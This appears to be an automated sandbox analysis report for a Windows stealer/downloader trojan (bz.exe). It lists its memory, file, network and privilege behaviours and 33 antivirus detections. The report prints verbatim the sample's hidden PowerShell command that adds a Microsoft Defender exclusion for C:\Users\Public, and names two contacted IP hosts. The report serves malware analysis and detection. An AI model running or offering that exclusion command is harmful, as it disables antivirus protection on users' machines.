NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02647000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02648000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02649000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\Public\Videos\Play.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 13, 2023, 10:51 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public" filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 13, 2023, 10:51 p.m.	process_identifier: 1884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 24576 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x003e0000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process bz.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
recv June 13, 2023, 10:51 p.m.	buffer: HTTP/1.1 200 OK Date: Tue, 13 Jun 2023 13:51:31 GMT Server: Apache/2.4.56 (Debian) Last-Modified: Mon, 12 Jun 2023 09:57:37 GMT ETag: "41432-5fdebbf966640" Accept-Ranges: bytes Content-Length: 267314 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}æ£Ù9Í9Í9ÍºÃ8ÍPÄ?ÍÐÀ8ÍRich9ÍPEL»ëdà°0ÌÀ@ða´(àÄ( l.text ª° `.dataÀÀ@À.rsrcÄàÐ@@¼ç¨^MSVBVM60.DLL received: 1024 socket: 984	1	1024	0
InternetReadFile June 13, 2023, 10:51 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}æ£Ù9Í9Í9ÍºÃ8ÍPÄ?ÍÐÀ8ÍRich9ÍPEL»ëdà°0ÌÀ@ða´(àÄ( l.text ª° `.dataÀÀ@À.rsrcÄàÐ@@¼ç¨^MSVBVM60.DLL request_handle: 0x00cc000c	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 13, 2023, 10:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"

Communicates with host for which no DNS query was performed (2 events)

host	181.142.211.88
host	51.79.49.73

Creates a suspicious Powershell process (2 events)

option	-noninteractive				value	Prevents creating an interactive prompt for the user
option	-noninteractive				value	Prevents creating an interactive prompt for the user

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

MicroWorld-eScan	Gen:Variant.Tedy.380556
FireEye	Gen:Variant.Tedy.380556
McAfee	RDN/Generic PWS.y
Malwarebytes	RiskWare.Agent.VB
Alibaba	Trojan:Application/Generic.da7d6155
Cybereason	malicious.8b13e6
Arcabit	Trojan.Tedy.D5CE8C
Cyren	W32/ABRisk.KZBF-6204
Symantec	Trojan Horse
Kaspersky	Trojan-Spy.Win32.Stealer.dypr
BitDefender	Gen:Variant.Tedy.380556
Avast	Win32:RATX-gen [Trj]
Sophos	Mal/Generic-S
DrWeb	Trojan.DownLoader45.58454
VIPRE	Gen:Variant.Tedy.380556
McAfee-GW-Edition	Artemis!Trojan
Trapmine	malicious.moderate.ml.score
Emsisoft	Gen:Variant.Tedy.380556 (B)
Webroot	W32.Trojan.Gen
Antiy-AVL	Trojan[Spy]/Win32.Stealer
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	Trojan-Spy.Win32.Stealer.dypr
GData	Win32.Trojan-Downloader.Generic.KSOA9V
Google	Detected
ALYac	Gen:Variant.Tedy.380556
MAX	malware (ai score=84)
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H09FC23
Rising	Stealer.Agent!8.C2 (CLOUD)
Fortinet	W32/PossibleThreat
AVG	Win32:RATX-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_60% (W)

bz.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All